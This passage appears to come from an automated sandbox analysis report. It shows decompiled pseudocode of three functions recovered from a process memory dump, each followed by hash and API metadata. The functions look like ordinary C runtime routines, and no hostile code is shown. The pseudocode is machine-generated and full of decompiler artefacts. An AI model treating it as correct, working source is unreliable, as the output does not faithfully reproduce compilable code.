                                                                    			E00420A11(void* __ecx, signed int _a4, intOrPtr _a8, char _a12) {
                                                                    				intOrPtr _v0;
                                                                    				intOrPtr* _v28;
                                                                    				intOrPtr _v32;
                                                                    				void* _t22;
                                                                    				signed int _t25;
                                                                    				signed int _t26;
                                                                    				signed int _t27;
                                                                    				signed int _t29;
                                                                    				signed int _t30;
                                                                    				signed int* _t34;
                                                                    				signed int _t36;
                                                                    				void* _t39;
                                                                    				signed int _t42;
                                                                    				intOrPtr _t44;
                                                                    				intOrPtr* _t45;
                                                                    				intOrPtr* _t48;
                                                                    				intOrPtr* _t49;
                                                                    				void* _t54;
                                                                    				void* _t55;
                                                                    
                                                                    				_t39 = __ecx;
                                                                    				_t42 = 0;
                                                                    				if(_a12 <= 0) {
                                                                    					L5:
                                                                    					return _t22;
                                                                    				} else {
                                                                    					_t2 =  &_a12; // 0x43553c
                                                                    					_t48 = _t2;
                                                                    					while(1) {
                                                                    						_t48 = _t48 + 4;
                                                                    						_t22 = E0042A89A(_a4, _a8,  *_t48);
                                                                    						_t54 = _t54 + 0xc;
                                                                    						if(_t22 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t42 = _t42 + 1;
                                                                    						if(_t42 < _a12) {
                                                                    							continue;
                                                                    						} else {
                                                                    							goto L5;
                                                                    						}
                                                                    						goto L38;
                                                                    					}
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					E004239B9();
                                                                    					asm("int3");
                                                                    					_push(0);
                                                                    					_push(_t48);
                                                                    					_push(_t42);
                                                                    					_t44 = _v32;
                                                                    					_t38 = 0;
                                                                    					E00426300(_t44, 0, 0x90);
                                                                    					_t49 = _v28;
                                                                    					_t25 =  *_t49;
                                                                    					_t55 = _t54 + 0xc;
                                                                    					__eflags = _t25;
                                                                    					if(_t25 != 0) {
                                                                    						__eflags = _t25 - 0x2e;
                                                                    						if(_t25 != 0x2e) {
                                                                    							L15:
                                                                    							_a4 = _t38;
                                                                    							_t26 = E0041FDA0(_t39, _t49, "_.,");
                                                                    							__eflags = _t26 - _t38;
                                                                    							while(1) {
                                                                    								_pop(_t39);
                                                                    								if(__eflags == 0) {
                                                                    									break;
                                                                    								}
                                                                    								__eflags = _a4;
                                                                    								_t45 = _t26 + _t49;
                                                                    								_t38 =  *_t45;
                                                                    								if(_a4 != 0) {
                                                                    									__eflags = _a4 - 1;
                                                                    									if(_a4 != 1) {
                                                                    										__eflags = _a4 - 2;
                                                                    										if(_a4 != 2) {
                                                                    											break;
                                                                    										} else {
                                                                    											__eflags = _t26 - 0x10;
                                                                    											if(_t26 >= 0x10) {
                                                                    												break;
                                                                    											} else {
                                                                    												__eflags = _t38;
                                                                    												if(_t38 == 0) {
                                                                    													L28:
                                                                    													_push(_t26);
                                                                    													_push(_t49);
                                                                    													_push(0x10);
                                                                    													_t29 = _v0 - 0xffffff80;
                                                                    													__eflags = _t29;
                                                                    													goto L29;
                                                                    												} else {
                                                                    													__eflags = _t38 - 0x2c;
                                                                    													if(_t38 != 0x2c) {
                                                                    														break;
                                                                    													} else {
                                                                    														goto L28;
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										__eflags = _t26 - 0x40;
                                                                    										if(_t26 >= 0x40) {
                                                                    											break;
                                                                    										} else {
                                                                    											__eflags = _t38 - 0x5f;
                                                                    											if(_t38 == 0x5f) {
                                                                    												break;
                                                                    											} else {
                                                                    												_push(_t26);
                                                                    												_push(_t49);
                                                                    												_push(0x40);
                                                                    												_t29 = _v0 + 0x40;
                                                                    												L29:
                                                                    												_push(_t29);
                                                                    												goto L30;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									__eflags = _t26 - 0x40;
                                                                    									if(_t26 >= 0x40) {
                                                                    										break;
                                                                    									} else {
                                                                    										__eflags = _t38 - 0x2e;
                                                                    										if(_t38 == 0x2e) {
                                                                    											break;
                                                                    										} else {
                                                                    											_push(_t26);
                                                                    											_push(_t49);
                                                                    											_push(0x40);
                                                                    											_push(_v0);
                                                                    											L30:
                                                                    											_t30 = E00429538();
                                                                    											_t55 = _t55 + 0x10;
                                                                    											__eflags = _t30;
                                                                    											if(_t30 != 0) {
                                                                    												_push(0);
                                                                    												_push(0);
                                                                    												_push(0);
                                                                    												_push(0);
                                                                    												_push(0);
                                                                    												goto L14;
                                                                    											} else {
                                                                    												__eflags = _t38 - 0x2c;
                                                                    												if(_t38 == 0x2c) {
                                                                    													goto L8;
                                                                    												} else {
                                                                    													__eflags = _t38;
                                                                    													if(_t38 == 0) {
                                                                    														goto L8;
                                                                    													} else {
                                                                    														_a4 = _a4 + 1;
                                                                    														_t21 = _t45 + 1; // 0x1
                                                                    														_t49 = _t21;
                                                                    														_t26 = E0041FDA0(_t39, _t49, "_.,");
                                                                    														__eflags = _t26;
                                                                    														continue;
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								goto L36;
                                                                    							}
                                                                    							_t27 = _t26 | 0xffffffff;
                                                                    							__eflags = _t27;
                                                                    						} else {
                                                                    							_t8 = _t49 + 1; // 0x1
                                                                    							_t34 = _t8;
                                                                    							__eflags =  *_t34;
                                                                    							if( *_t34 == 0) {
                                                                    								goto L15;
                                                                    							} else {
                                                                    								_t9 = _t44 + 0x80; // 0x80
                                                                    								_t36 = E00429538(_t9, 0x10, _t34, 0xf);
                                                                    								_t55 = _t55 + 0x10;
                                                                    								__eflags = _t36;
                                                                    								if(_t36 != 0) {
                                                                    									_push(0);
                                                                    									_push(0);
                                                                    									_push(0);
                                                                    									_push(0);
                                                                    									_push(0);
                                                                    									L14:
                                                                    									E004239B9();
                                                                    									goto L15;
                                                                    								} else {
                                                                    									 *((char*)(_t44 + 0x8f)) = 0;
                                                                    									goto L8;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						L8:
                                                                    						_t27 = 0;
                                                                    					}
                                                                    					L36:
                                                                    					return _t27;
                                                                    				}
                                                                    				L38:
                                                                    			}























                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __invoke_watson_strcat_s
                                                                    • String ID: <UC
                                                                    • API String ID: 228796091-4197022941
                                                                    • Opcode ID: 4e961948464a8f77531ec4b236e122161e7f04dc228d8548b5ecd0139bbe3b52
                                                                    • Instruction ID: b90124ec2b4e3cba171f6c46be55adacba472da928b444e3b95940ccea777869
                                                                    • Opcode Fuzzy Hash: 4e961948464a8f77531ec4b236e122161e7f04dc228d8548b5ecd0139bbe3b52
                                                                    • Instruction Fuzzy Hash: 02E09273700229ABCB115E56FC4199B777AFFC0368B81443AFD1852102D6359A629694
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E00414893(signed int __ecx, void* __edi, void* __esi) {
                                                                    				signed int _v8;
                                                                    				char _v20;
                                                                    				void* _t7;
                                                                    				void* _t12;
                                                                    				void* _t17;
                                                                    
                                                                    				_t7 = 0;
                                                                    				if(__ecx != 0) {
                                                                    					_t21 = __ecx - 0x9249249;
                                                                    					if(__ecx > 0x9249249) {
                                                                    						L3:
                                                                    						_v8 = _v8 & 0x00000000;
                                                                    						E0041DC00( &_v20,  &_v8);
                                                                    						_v20 = 0x435264;
                                                                    						return E0041FF86( &_v20, 0x440c30);
                                                                    					}
                                                                    					_t7 = E0041E24D(_t12, _t17, __edi, __esi, _t21, __ecx * 0x1c);
                                                                    					if(0 == 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				return _t7;
                                                                    			}









                                                                    APIs
                                                                    • std::exception::exception.LIBCMT ref: 004148C0
                                                                    • __CxxThrowException@8.LIBCMT ref: 004148D5
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                    • String ID: dRC-cA
                                                                    • API String ID: 4063778783-2521504582
                                                                    • Opcode ID: 94b3183e8a8801c30e80c3482683423a11b4662fa2ec3b3f1be7f9196e92ac51
                                                                    • Instruction ID: 4d659d6e53ef5db25c334d1d2797d36fc85ff34a261341b4790aeaf922fe2f1d
                                                                    • Opcode Fuzzy Hash: 94b3183e8a8801c30e80c3482683423a11b4662fa2ec3b3f1be7f9196e92ac51
                                                                    • Instruction Fuzzy Hash: C0E0D87992024B96DB1CFBA5CD62AFFB6BC9F10308F60056F9001D1041EBB8D98487AD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E004171A6(void* __ebx, intOrPtr __ecx, void* __esi, void* __eflags) {
                                                                    				void* _t24;
                                                                    				void* _t27;
                                                                    
                                                                    				_push(4);
                                                                    				E004207D5(E00433B55, __ebx, _t24, __esi);
                                                                    				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
                                                                    				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx - 0x50)) + 4)) + __ecx - 0x50)) = 0x43f674;
                                                                    				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
                                                                    				E00416C76(__ecx - 0x4c, _t24);
                                                                    				_t10 =  *((intOrPtr*)(__ecx - 0x50)) + 4; // 0x0
                                                                    				 *((intOrPtr*)( *_t10 + __ecx - 0x50)) = 0x43f624;
                                                                    				return E00420874( *_t10);
                                                                    			}






                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID: (sA$trA
                                                                    • API String ID: 431132790-3915461764
                                                                    • Opcode ID: 287cd1e5549fd9204a34cec1bdef57c8ee7073f69bccd15e7c270e9ffc394b3f
                                                                    • Instruction ID: ce6ae6e806d445d1c47f7e23111bb322584568090f38264761f7243577eb93c7
                                                                    • Opcode Fuzzy Hash: 287cd1e5549fd9204a34cec1bdef57c8ee7073f69bccd15e7c270e9ffc394b3f
                                                                    • Instruction Fuzzy Hash: 17E09A74A001548FE710DF49D145E48B7E0BB18309F85959EA5409B366DB78D909CB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%